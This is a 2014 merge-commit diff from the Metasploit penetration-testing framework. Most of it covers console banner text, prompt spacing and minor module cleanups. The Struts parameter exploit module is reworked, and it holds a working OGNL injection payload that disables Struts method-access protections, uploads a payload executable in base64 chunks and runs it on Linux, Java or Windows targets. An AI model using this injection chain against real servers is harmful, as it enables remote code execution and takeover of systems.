Merge branch 'master' into staging/electro_release

2014-05-12 11:38:14 -05:00 · 2014-05-12 11:38:14 -05:00 · 57864cc6c9
parent 8b937b7c35 b5ba261ffe
commit 57864cc6c9
5 changed files with 106 additions and 74 deletions
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@ -344,7 +344,7 @@ class Core
      # Restore the prompt
      prompt = framework.datastore['Prompt'] || Msf::Ui::Console::Driver::DefaultPrompt
      prompt_char = framework.datastore['PromptChar'] || Msf::Ui::Console::Driver::DefaultPromptChar
-      driver.update_prompt("#{prompt}", prompt_char, true)
+      driver.update_prompt("#{prompt} ", prompt_char, true)
    end
  end

@ -384,40 +384,42 @@ class Core
  def cmd_banner(*args)
    banner  = "%cya" + Banner.to_s + "%clr\n\n"

-    if is_apt
+    # These messages should /not/ show up when you're on a git checkout;
+    # you're a developer, so you already know all this.
+    if (is_apt || binary_install)
      content = [
-        "Large pentest? List, sort, group, tag and search your hosts and services\nin Metasploit Pro -- type 'go_pro' to launch it now.",
-        "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- type 'go_pro' to launch it now.",
-        "Save your shells from AV! Upgrade to advanced AV evasion using dynamic\nexe templates with Metasploit Pro -- type 'go_pro' to launch it now.",
-        "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro's wizard -- type 'go_pro' to launch it now.",
-        "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type 'go_pro' to launch it now.",
-        "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\n-- type 'go_pro' to launch it now."
+        "Trouble managing data? List, sort, group, tag and search your pentest data\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit",
+        "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- learn more on http://rapid7.com/metasploit",
+        "Payload caught by AV? Fly under the radar with Dynamic Payloads in\nMetasploit Pro -- learn more on http://rapid7.com/metasploit",
+        "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit",
+        "Taking notes in notepad? Have Metasploit Pro track & report\nyour progress and findings -- learn more on http://rapid7.com/metasploit",
+        "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\nLearn more on http://rapid7.com/metasploit",
+        "Love leveraging credentials? Check out bruteforcing\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit",
+        "Save 45% of your time on large engagements with Metasploit Pro\nLearn more on http://rapid7.com/metasploit",
+        "Validate lots of vulnerabilities to demonstrate exposure\nwith Metasploit Pro -- Learn more on http://rapid7.com/metasploit"
      ]
      banner << content.sample # Ruby 1.9-ism!
      banner << "\n\n"
    end

-    banner << "       =[ %yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr ]\n"
-    banner << "+ -- --=[ "
-    banner << "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post ]\n"
-    banner << "+ -- --=[ "
-
-    oldwarn = nil
    avdwarn = nil

-    banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops      ]\n"
-    if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate)
-      tstamp = ::Msf::Framework::RepoUpdatedDate.strftime("%Y.%m.%d")
-      banner << "       =[ svn r#{::Msf::Framework::RepoRevision} updated #{::Msf::Framework::RepoUpdatedDaysNote} (#{tstamp})\n"
-      if(::Msf::Framework::RepoUpdatedDays > 7)
-        oldwarn = []
-        oldwarn << "Warning: This copy of the Metasploit Framework was last updated #{::Msf::Framework::RepoUpdatedDaysNote}."
-        oldwarn << "         We recommend that you update the framework at least every other day."
-        oldwarn << "         For information on updating your copy of Metasploit, please see:"
-        oldwarn << "             https://community.rapid7.com/docs/DOC-1306"
-        oldwarn << ""
-      end
-    end
+    banner_trailers = {
+      :version     => "%yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr",
+      :exp_aux_pos => "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post",
+      :pay_enc_nop => "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops",
+      :free_trial  => "Free Metasploit Pro trial: http://r-7.co/trymsp",
+      :padding     => 48
+    }
+
+    banner << ("       =[ %-#{banner_trailers[:padding]+8}s]\n" % banner_trailers[:version])
+    banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:exp_aux_pos])
+    banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:pay_enc_nop])
+
+    # TODO: People who are already on a Pro install shouldn't see this.
+    # It's hard for Framework to tell the difference though since
+    # license details are only in Pro -- we can't see them from here.
+    banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:free_trial])

    if ::Msf::Framework::EICARCorrupted
      avdwarn = []
@ -428,22 +430,9 @@ class Core
      avdwarn << ""
    end

-    # We're running a two week survey to gather feedback from users.
-    # Let's make sure we reach regular msfconsole users.
-    # TODO: Get rid of this sometime after 2014-01-23
-    survey_expires = Time.new(2014,"Jan",22,23,59,59,"-05:00")
-    if Time.now.to_i < survey_expires.to_i
-      banner << "+ -- --=[ Answer Q's about Metasploit and win a WiFi Pineapple Mk5   ]\n"
-      banner << "+ -- --=[ http://bit.ly/msfsurvey (Expires #{survey_expires.ctime}) ]\n"
-    end
-
    # Display the banner
    print_line(banner)

-    if(oldwarn)
-      oldwarn.map{|line| print_line(line) }
-    end
-
    if(avdwarn)
      avdwarn.map{|line| print_error(line) }
    end
@ -2620,7 +2609,7 @@ class Core
    if mod # if there is an active module, give them the fanciness they have come to expect
      driver.update_prompt("#{prompt} #{mod.type}(%bld%red#{mod.shortname}%clr) ", prompt_char, true)
    else
-      driver.update_prompt("#{prompt}", prompt_char, true)
+      driver.update_prompt("#{prompt} ", prompt_char, true)
    end

    # dump the command's output so we can grep it
@ -3040,6 +3029,18 @@ class Core
    File.exists?(File.expand_path(File.join(msfbase_dir, '.apt')))
  end

+  # Determines if we're a Metasploit Pro/Community/Express
+  # installation or a tarball/git checkout
+  #
+  # @return [Boolean] true if we are a binary install
+  def binary_install
+    binary_paths = [
+      'C:/metasploit/apps/pro/msf3',
+      '/opt/metasploit/apps/pro/msf3'
+    ]
+    return binary_paths.include? Msf::Config.install_root
+  end
+
  #
  # Module list enumeration
  #
--- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb
+++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
    register_options(
      [
        OptString.new('TARGET_URI', [ false, "Single target URI", nil]),
-        OptPath.new('TARGET_URIS_FILE', [ false, "Path to list of URIs to request", 
+        OptPath.new('TARGET_URIS_FILE', [ false, "Path to list of URIs to request",
          File.join(Msf::Config.data_directory, "wordlists", "http_owa_common.txt")]),
      ], self.class)
  end
--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@ -228,7 +228,7 @@ class Metasploit3 < Msf::Auxiliary
    # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3
    # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html
    sock.get_once
-    # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), 
+    # the postgres SSLRequest packet is a int32(8) followed by a int16(1234),
    # int16(5679) in network format
    psql_sslrequest = [8].pack('N')
    psql_sslrequest << [1234, 5679].pack('n*')
--- a/modules/exploits/multi/http/struts_code_exec_parameters.rb
+++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
        [
          'Meder Kydyraliev', # Vulnerability Discovery and PoC
          'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
-          'mihi' #ARCH_JAVA support
+          'mihi', #ARCH_JAVA support
+          'Christian Mehlmauer' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
@ -66,75 +67,106 @@ class Metasploit3 < Msf::Exploit::Remote
      register_options(
        [
          Opt::RPORT(8080),
-          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
-          OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
-          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
+          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
+          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]),
+          OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a&param2=b". Do apply URL encoding to the parameters names and values if needed.', nil]),
+          OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. Ensure there is a trailing slash!', nil])
    ], self.class)
  end

-  def execute_command(cmd, opts = {})
-    inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
-    inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
-    inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
-    inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
-    uri = String.new(datastore['TARGETURI'])
-    uri = normalize_uri(uri)
-    uri.gsub!(/INJECT/,inject) # append the injection string
+  def parameter
+    datastore['PARAMETER']
+  end
+
+  def temp_path
+    return nil unless datastore['TMP_PATH']
+    unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\')
+      fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH')
+    end
+    datastore['TMP_PATH']
+  end
+
+  def get_parameter
+    retval = {}
+    return retval unless datastore['GET_PARAMETERS']
+    splitted = datastore['GET_PARAMETERS'].split('&')
+    return retval if splitted.nil? || splitted.empty?
+    splitted.each { |item|
+      name, value = item.split('=')
+      # no check here, value can be nil if parameter is &param
+      decoded_name = name ? Rex::Text::uri_decode(name) : nil
+      decoded_value = value ? Rex::Text::uri_decode(value) : nil
+      retval[decoded_name] = decoded_value
+    }
+    retval
+  end
+
+  def execute_command(cmd)
+    junk = Rex::Text.rand_text_alpha(6)
+    inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
+    inject << "= new java.lang.Boolean(true),#{cmd})('#{junk}')"
+    uri = normalize_uri(datastore['TARGETURI'])
    resp = send_request_cgi({
      'uri'     => uri,
      'version' => '1.1',
      'method'  => 'GET',
+      'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' }.merge(get_parameter)
    })
-    return resp #Used for check function.
+    resp
  end

  def exploit
    #Set up generic values.
-    @payload_exe = rand_text_alphanumeric(4+rand(4))
+    payload_exe = rand_text_alphanumeric(4 + rand(4))
    pl_exe = generate_payload_exe
-    append = 'false'
+    append = false
    #Now arch specific...
    case target['Platform']
    when 'linux'
-      @payload_exe = "/tmp/#{@payload_exe}"
-      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
-      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
+      path = temp_path || '/tmp/'
+      payload_exe = "#{path}#{payload_exe}"
+      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))"
+      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{payload_exe}\".split(\"_\"))"
    when 'java'
-      @payload_exe << ".jar"
+      payload_exe = "#{temp_path}#{payload_exe}.jar"
      pl_exe = payload.encoded_jar.pack
-      exec_cmd = ""
+      exec_cmd = ''
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
-      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
+      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{payload_exe}').toURI().toURL()}),"
      exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
      exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
      exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
    when 'windows'
-      @payload_exe = "./#{@payload_exe}.exe"
-      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
+      path = temp_path || './'
+      payload_exe = "#{path}#{payload_exe}.exe"
+      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')"
    else
      fail_with(Failure::NoTarget, 'Unsupported target platform!')
    end

+    print_status("#{peer} - Uploading exploit to #{payload_exe}")
    #Now with all the arch specific stuff set, perform the upload.
    #109 = length of command string plus the max length of append.
-    sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length
+    sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length
    chunk_length = 2048 - sub_from_chunk
-    chunk_length = ((chunk_length/4).floor)*3
+    chunk_length = ((chunk_length/4).floor) * 3
    while pl_exe.length > chunk_length
-      java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
+      java_upload_part(pl_exe[0,chunk_length], payload_exe, append)
      pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
      append = true
    end
-    java_upload_part(pl_exe,@payload_exe,append)
+    java_upload_part(pl_exe, payload_exe, append)
+    print_status("#{peer} - Executing payload")
    execute_command(chmod_cmd) if target['Platform'] == 'linux'
    execute_command(exec_cmd)
-    register_files_for_cleanup(@payload_exe)
+    register_files_for_cleanup(payload_exe)
  end

-  def java_upload_part(part, filename, append = 'false')
+  def java_upload_part(part, filename, append = false)
    cmd = ""
    cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
    cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
@ -151,7 +183,6 @@ class Metasploit3 < Msf::Exploit::Remote
    t2 = Time.now
    delta = t2 - t1

-
    if response.nil?
      return Exploit::CheckCode::Safe
    elsif delta < sleep_time
--- a/modules/post/multi/gather/wlan_geolocate.rb
+++ b/modules/post/multi/gather/wlan_geolocate.rb
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
        Optionally geolocate the target by gathering local wireless networks and
        performing a lookup against Google APIs.},
        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Tom Sellers <tom <at> fadedcode.net>'],
+        'Author'        => [ 'Tom Sellers <tom [at] fadedcode.net>'],
        'Platform'      => %w{ osx win linux bsd solaris },
        'SessionTypes'  => [ 'meterpreter', 'shell' ],
      ))